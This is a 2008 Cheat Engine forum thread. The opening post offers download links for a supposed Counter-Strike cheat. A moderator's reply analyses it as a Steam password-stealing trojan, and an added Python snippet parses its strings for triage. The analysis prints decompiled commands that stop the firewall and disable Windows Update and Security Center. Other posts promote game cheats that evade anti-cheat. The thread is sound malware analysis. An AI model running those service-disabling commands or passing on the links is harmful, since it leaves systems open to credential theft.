Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 


CS 1.6 Ultimate Rep-(H)ack

 
Weaxer
Advanced Cheater
Reputation: 0

Joined: 18 Jul 2007
Posts: 55

Posted: Sat Feb 23, 2008 6:23 am    Post subject: CS 1.6 Ultimate Rep-(H)ack

This is a new CS trainer that I put together with my friends. Not made with CE though. It has:

- Aimbot
- Speed hack
- Wall hack
- No Clip
- Rear View (spectator sort of, can be used while playing)

DOWNLOAD

Rapidshare: http://rapidshare.de/files/38651774/CS_1.6_RepHack.rar.html
Speedyshare: http://www.speedyshare.com/779902842.html

_________________
Fuck off
atom0s
Moderator
Reputation: 98

Joined: 25 Jan 2006
Posts: 5638
Location: 127.0.0.1

Posted: Sat Feb 23, 2008 7:00 am

I wouldn't trust this. Firstly, the DLL exports functions that have nothing to do with Counter Strike, let alone the fact that the DLL is renamed from the original file, which was ZLZ.dll (stolen?). Google for that DLL and you will find a few different results, the first few being trojans, the others being debugging / bypasses found on MPC forums.

The second funny part is that the injector itself is written in VB6, has the icon of an installer, and has two resources that are also EXEs that get extracted.

The injector is also renamed from server.exe, even more suspicious. It connects to the internet and uses APIs that a loader should not even touch:

Code:
'VA: 4030C0
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
'VA: 40306C
Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, lpSource As Any, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, Arguments As Long) As Long
'VA: 403024
Private Declare Sub RegisterServiceProcess Lib "kernel32"()
'VA: 402FD4
Private Declare Function GetKeyState Lib "user32" Alias "GetKeyState" (ByVal nVirtKey As Long) As Integer
'VA: 402F90
Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer
'VA: 402F44
Private Declare Sub FtpPutFileA Lib "wininet.dll"()
'VA: 402F00
Private Declare Sub InternetConnectA Lib "wininet.dll"()
'VA: 402EB4
Private Declare Sub InternetCloseHandle Lib "wininet.dll"()
'VA: 402E4C
Private Declare Sub InternetOpenA Lib "wininet.dll"()
'VA: 402DF4
Private Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As Long
'VA: 402DA8
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
'VA: 402D54
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long
'VA: 402D08
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long


Following that, decompiling the loader showed some functions that do the following:

- Obtain the temp and system32 directory of the computer and locate comctrl32.ocx and regsvr32.exe
- Obtain the computer name.
- Extract the resources (the two exes) and load them.
- Upload a file to the internet. (Probably your Steam account info.)
- Connect to an FTP server to upload the file.

Some of the files extracted are:
C:\Steamacc.exe
C:\err_log.txt

The loader also writes to the registry and stops services:

loc_00404D99: var_7C = "cmd.exe /c net stop"
loc_00404E02: var_7C = "cmd.exe /c net stop SharedAccess"

loc_00404E4D: var_7C = "reg add"
loc_00404E54: var_00000084 = 8
loc_00404E5A: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess"
loc_00404E64: var_00000094 = 8
loc_00404E6A: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"

loc_00404EE7: var_7C = "cmd.exe /c reg add"
loc_00404EEE: var_00000084 = 8
loc_00404EF4: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv"
loc_00404EFE: var_00000094 = 8
loc_00404F04: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"

loc_00404F93: var_7C = "cmd.exe /c reg add"
loc_00404F9A: var_00000084 = 8
loc_00404FA0: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc"
loc_00404FAA: var_00000094 = 8
loc_00404FB0: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"



The two resourced files are:

Resource #1: Packed with armadillo (so I'm not running it to unpack it.)
Resource #2: Appears to be COMDLG32.OCX

Resource #1 contains another resource that's packed, which appears to be called STEAM_DLL, which is probably either a keylogger or used to mimic one of the Steam DLLs.

And aside from self-analysis:

Code:
A-Squared               Found Trojan-PSW.Win32.Steam.t
AntiVir                 Found TR/PSW.Steam.T
ArcaVir                 Found Trojan.Psw.Steam.T
Avast                   Found nothing
AVG Antivirus           Found PSW.Generic5.SFH
BitDefender             Found nothing
ClamAV                  Found Trojan.Spy-16734
CPsecure                Found Troj.PSW.W32.Steam.ae
Dr.Web                  Found nothing
F-Prot Antivirus        Found Possibly a new variant of W32/VB-Backdoor-ESVR-based!Maximus
F-Secure Anti-Virus     Found Trojan-PSW.Win32.Steam.t
Fortinet                Found nothing
Ikarus                  Found Trojan-PWS.Win32.Steam.t
Kaspersky Anti-Virus    Found Trojan-PSW.Win32.Steam.t
NOD32                   Found probably a variant of Win32/PSW.Agent (probable variant)
Norman Virus Control    Found nothing
Panda Antivirus         Found nothing
Rising Antivirus        Found Trojan.PSW.Win32.Steam.t
Sophos Antivirus        Found Sus/ComPack (probable variant)
VirusBuster             Found nothing
VBA32                   Found Trojan-PSW.Win32.Steam.t

_________________
- Retired.
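
The service-tampering strings in the analysis above can be picked out mechanically during triage. This is an added example, not part of the original post or of the analysed sample; it assumes the decompiler dump layout quoted in the post, and `service_tampering`, `ROLES` and `SAMPLE` are names made up here.

```python
import re

# Roles of the services named in the post's decompiled strings.
ROLES = {"sharedaccess": "Windows Firewall / Internet Connection Sharing",
         "wuauserv": "Automatic Updates", "wscsvc": "Security Center"}
STR_RE = re.compile(r'=\s*"(.*)"\s*$')   # string literal assigned on a dump line
KEY_RE = re.compile(r'CurrentControlSet\\Services\\(\w+)', re.I)
START_RE = re.compile(r'/v\s+Start\b.*?/d\s+(0x[0-9a-f]+|\d+)', re.I)
STOP_RE = re.compile(r'\bnet\s+stop\s+(\w+)', re.I)

def service_tampering(dump):
    """Return sorted (service, action, role) tuples found in a string dump."""
    found = set()
    for group in re.split(r'\n\s*\n', dump.strip()):
        # One command is split over consecutive lines; blank lines end a group.
        strings = [m.group(1) for m in map(STR_RE.search, group.splitlines()) if m]
        for s in strings:
            found.update((svc, "stopped") for svc in STOP_RE.findall(s))
        text = " ".join(strings)
        key, start = KEY_RE.search(text), START_RE.search(text)
        if "reg add" in text.lower() and key and start:
            v = start.group(1).lower()
            # Start = 4 is SERVICE_DISABLED: the service cannot be started.
            if int(v, 16 if v.startswith("0x") else 10) == 4:
                found.add((key.group(1), "disabled"))
    return sorted((s, a, ROLES.get(s.lower(), "unknown")) for s, a in found)

# Excerpt of the strings quoted in the post above (type-tag line kept once).
SAMPLE = r'''
loc_00404D99: var_7C = "cmd.exe /c net stop"
loc_00404E02: var_7C = "cmd.exe /c net stop SharedAccess"

loc_00404E4D: var_7C = "reg add"
loc_00404E54: var_00000084 = 8
loc_00404E5A: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess"
loc_00404E6A: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"

loc_00404EE7: var_7C = "cmd.exe /c reg add"
loc_00404EF4: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv"
loc_00404F04: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"

loc_00404F93: var_7C = "cmd.exe /c reg add"
loc_00404FA0: var_0000008C = "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc"
loc_00404FB0: var_0000009C = "/v Start /t REG_DWORD /d 0x4 /f"
'''

if __name__ == "__main__":
    for svc, action, role in service_tampering(SAMPLE):
        print(f"{svc:13} {action:9} {role}")
```

A Start value other than 4, or a bare `net stop` with no service name, produces no finding.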
SunBeam
I post too much
Reputation: 28

Joined: 25 Feb 2005
Posts: 3322
Location: Romania

Posted: Sat Feb 23, 2008 7:10 am

"This is a new CS trainer that I put together with my friends."

It's always like that. You can tell by the first sentence in their post that it's a fake, stolen or not their work. Word of advice - packed .dll + hijacking of registry = not a hack or a trainer..
podr
How do I cheat?
Reputation: 0

Joined: 27 Feb 2008
Posts: 2

Posted: Wed Feb 27, 2008 6:01 pm

I used to do some OpenGL hacking via DLL files into the HL engine back in the day. This is just a rip of a hack. Using these non-secure cheats is very dangerous; they call to memory locations in your computer, and not only could you get banned by VAC, you can get your computer fucked. If anyone wants me to release a 'Cheat Engine CS Hack' that will be VAC proof for quite a while, send me a PM and I will do it.
samuri25404
Grandmaster Cheater
Reputation: 5

Joined: 04 May 2007
Posts: 960
Location: Why do you care?

Posted: Thu Feb 28, 2008 9:00 pm

SunBeam wrote:
"This is a new CS trainer that I put together with my friends."

It's always like that. You can tell by the first sentence in their post that it's a fake, stolen or not their work. Word of advice - packed .dll + hijacking of registry = not a hack or a trainer..


Oh it's a hack alright... Rolling Eyes

_________________
Wiccaan wrote:

Oh jeez, watchout I'm a bias person! Locked.


Auto Assembly Tuts:
In Depth Tutorial on AA
Extended
Woofie134
Cheater
Reputation: 0

Joined: 28 Feb 2008
Posts: 40
Location: LOOK FOR YOURSELF (look behind the door!!)

Posted: Fri Feb 29, 2008 2:30 am

It's a hack, not a trainer. Mostly the aimbot gets you banned, and so does the rest, so you shouldn't post it.
glasius
Expert Cheater
Reputation: 0

Joined: 31 Dec 2007
Posts: 109
Location: Scotland

Posted: Thu May 22, 2008 10:37 am

Hmm, I don't understand, um, any of that XD, but I'm not getting it because of what your searches found, so ty.
Labyrnth
Moderator
Reputation: 8

Joined: 28 Nov 2006
Posts: 6303

Posted: Thu May 22, 2008 11:02 am

glasius wrote:
Hmm, I don't understand, um, any of that XD, but I'm not getting it because of what your searches found, so ty.


Let's not quote large posts, much less dig up old topics.
I already edited your post.....
glasius
Expert Cheater
Reputation: 0

Joined: 31 Dec 2007
Posts: 109
Location: Scotland

Posted: Thu May 22, 2008 11:06 am

Labyrnth wrote:
glasius wrote:
Hmm, I don't understand, um, any of that XD, but I'm not getting it because of what your searches found, so ty.


Let's not quote large posts, much less dig up old topics.
I already edited your post.....


Surprised. Never noticed this was old, I found it on search looking for Steam.

Labyrnth
Moderator
Reputation: 8

Joined: 28 Nov 2006
Posts: 6303

Posted: Thu May 22, 2008 11:07 am

That's ok man, I know when people dig old stuff it is from a search.
007010
Advanced Cheater
Reputation: 0

Joined: 15 Apr 2008
Posts: 69
Location: RIGHT BEHIND YOU

Posted: Tue May 27, 2008 11:27 am    Post subject: OMFG

It contains 2 trojans and a bot in it. Could someone explain what a bot does? Sorry for my n00byness, but I used Kaspersky to check it.
_________________
HAY just p.m me if any trainers need making
atom0s
Moderator
Reputation: 98

Joined: 25 Jan 2006
Posts: 5638
Location: 127.0.0.1

Posted: Tue May 27, 2008 4:42 pm

Bots are used to simulate human actions.
_________________
- Retired.
All times are GMT - 6 Hours